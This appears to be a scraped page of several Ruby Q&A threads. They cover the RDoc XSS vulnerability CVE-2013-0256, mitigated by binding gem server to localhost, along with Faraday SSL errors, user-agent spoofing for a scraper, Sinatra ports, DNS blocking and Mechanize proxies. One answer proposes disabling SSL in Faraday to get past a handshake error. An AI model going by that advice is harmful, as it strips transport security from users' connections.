I've just read http://www.ruby-lang.org/en/news/2013/02/06/rdoc-xss-cve-2013-0256/ , a report about an XSS exploit in RDoc.
I'm on Ubuntu 12.04, and I doubt Ubuntu will be dealing with this vulnerability any time soon.
Will deleting all RDoc documentation, and uninstalling the rdoc executable make me safe from this vulnerability?
I don't host RDoc documents to the public, but I occasionally might run gem server for my own viewing if I forget about this vulnerability.
In your case you are safe unless you had a malicious user give you a crafted link to your own server. Basically if someone was hosting rdoc with this exploit a malicious user can send someone a crafted link to this by putting code in a target reference in a URL. If you look at the diff in the CVE you can see that originally the variable "target" was being passed in to the wrapping code unprotected. Then someone could send something like http://example.com/rdoc/File.html#code to inject cookie stealing stuff and that would be rendered by the victims browser.
Running gem server locally should be safe if you adjust how it launches:
gem server -b 127.0.0.1
Server started at http://127.0.0.1:8808
Notice it's on IP 127.0.0.1, which isn't accessible from other machines, only yours. It's the loopback, used for internal connections only.
I started the above server on one of my development hosts, and tried to hit it from my desktop. The connection failed saying it couldn't establish a connection.
Hitting it from that box using OpenURI and Nokogiri inside IRB returns:
Nokogiri::HTML(open('http://127.0.0.1:8808')).at('title').text
=> "RubyGems Documentation Index"
so somethin's alive out there and my log shows:
localhost - - [06/Feb/2013:16:08:56 MST] "GET / HTTP/1.1" 200 52435
- -> /
Related
I am a total newbie which has started learning Ruby so please be patient with me.
I am doing Ruby challenges where I need to run a Ruby file that launches a web server on my computer. First I run this application in command line with a command:
ruby app.rb
Then I paste this URL to my browser and access to my local server:
http://localhost:4567
On this local web page I click the link that gets connected to a web server on Internet where I should get authenticated. Till this moment everything works good, but during the authentication I have got an error. If there wasn’t any error during my authorization, the application would retrieve my profile data from the internet server. This is the error that I am getting:
Faraday::SSLError at /callback
handshake alert: unrecognized_name.
I have been trying to resolve this problem for two days. What I have done:
1) I think this error is connected somehow with Java. I tried to run this application with all versions of Java (6, 7, 8) as people said they had the same problem when they updated to a higher java version. Unfortunately, my version of Ruby doesn’t accept Java 6.
2) Possible solution which was posted here SSL handshake alert: unrecognized_name error since upgrade to Java 1.7.0), the same as here in 20 similar posts in Stackoverflow about "handshake alert: unrecognized_name" error, where it is suggested to set the jsse.enableSNIExtension property. But I couldn’t understand any of those answers, specifically, where to apply this code. Then I found this link https://community.jivesoftware.com/docs/DOC-140837 where it was advised to open the Java Control Panel (I did it through System Preferences Java). I went through the Java tab and clicked View and added “-Djsse.enableSNIExtension=false” to the Runtime Parameters and applied it.
3) Another possible solution was found here Disable SNI Extension for Ruby net/http - Using IP address with SSL/TLS (the answer given by ZebGir) but I didn’t find the file *http.rb in my .rvm or even within my whole system.
Please advise any hint or link with the possible solution for my issue.
My system is Mac OS X El Capitan.
RVM version 1.27.
Java version 1.8.
Have you tried disabling the ssl setting for your the faraday library? Something like:
connection = Faraday.new 'https://example.com', :ssl => false
Also see: https://github.com/lostisland/faraday/wiki/Setting-up-SSL-certificates
I have a server running on debian. It runs a scraper using ruby and watir which loads up in a headless fashion. I notice that a site can read the HTTP header my browser passes. How can I hide the HTTP info, or give false info, so a site cannot see my computer operating system?
I figured out a solution. I used x11 forwarding to access chrome from my local computer which has a user interface. It is possible to change the User Agent via dev tools -> network conditions, but this does NOT persist on new sessions. So I installed the first result on google for "plugin change chrome user-agent" and this does the trick.
I'm using Codio to create a Sinatra app. Obviously, since it's cloud-based, I've added the line set :bind, '0.0.0.0' to app.rb. I've also set my database.yml file to say host: 0.0.0.0for both the development and test environments. (I'm using PostgreSQL, and yes I made sure under Tools --> Install Software, that it is running. )
When I run ruby app.rb in my terminal, Sinatra takes the stage at Port 4567, which I'm able to view perfectly fine.
But when I run rackup, on the other hand, Sinatra takes the stage at Port 9292. Trying to preview at that port yields a HTTP Error 502 Bad Gateway status.
(Note: I'm unable to post within the Codio Community forums at the moment--their system doesn't seem to realize I'm logged in when I go into their forums page, and it won't let me log in. I'm standing by for help from them on that. Until then, I figured I'd reach out here on StackOverflow.)
Kenia
Hi.. saw your message to us and replied but seems you haven't picked it up yet? That message though wasn't clear you were talking about the Codio forum :) You need to register separately there - the forum is not associated with your Codio account credentials
I ran
$ gem fetch -V github-linguist
GET http://rubygems.org/latest_specs.4.8.gz
302 Moved Temporarily
GET http://production.s3.rubygems.org/latest_specs.4.8.gz
200 OK
ERROR: While executing gem ... (Zlib::GzipFile::Error)
not in gzip format
then to my shock I opened the link in my browser and see
this message
Norton DNS
Malicious Web Site Blocked
You attempted to access: production.s3.rubygems.org
This is a known malicious web site. It is recommended that you do NOT visit
this site. This site points to production.s3.rubygems.org.s3.amazonaws.com,
which is malicious.
On pencil’s suggestion I ran
namebench and have switched to OpenDNS-2.
Probably someone used AWS to distribute malware and some buggy automatism now blockes *.amazonaws.com
Must be a filter anywhere between you and Amazon (Router/Firewall, Proxy, ISP, Name Server, ...). Start by using different name servers (like Google's 8.8.8.8).
I found a neat Ruby script to sum all purchases done on Amazon.de (no other stores like US) for a given year:
https://github.com/pwaldhauer/amazon-account-crawler
After installing Ruby and the necessary Ruby Gems Highline and Mechanize I'm able to run the script. But unfortunately I'm behind a proxy server so the script fails with a "Timeout" error.
I read a lot but didn't found out how to use a proxy server. I tried to "set" a HTTP_PROXY environment variable, but still get errors. I also used the following call:
agent.set_proxy('127.0.0.1', '3128')
But this didn't worked out as well. I have the feeling that the HTTP proxy worked but after the login Amazon uses HTTPS and this fails.
Can someone tell me a simple way how to tell Mechanize to use a HTTP and HTTPS proxy server?
There is a known issue with mechanize https and proxies, you will need to use an older version (1.0.0) to get it to work. Also the port should be a number not a string.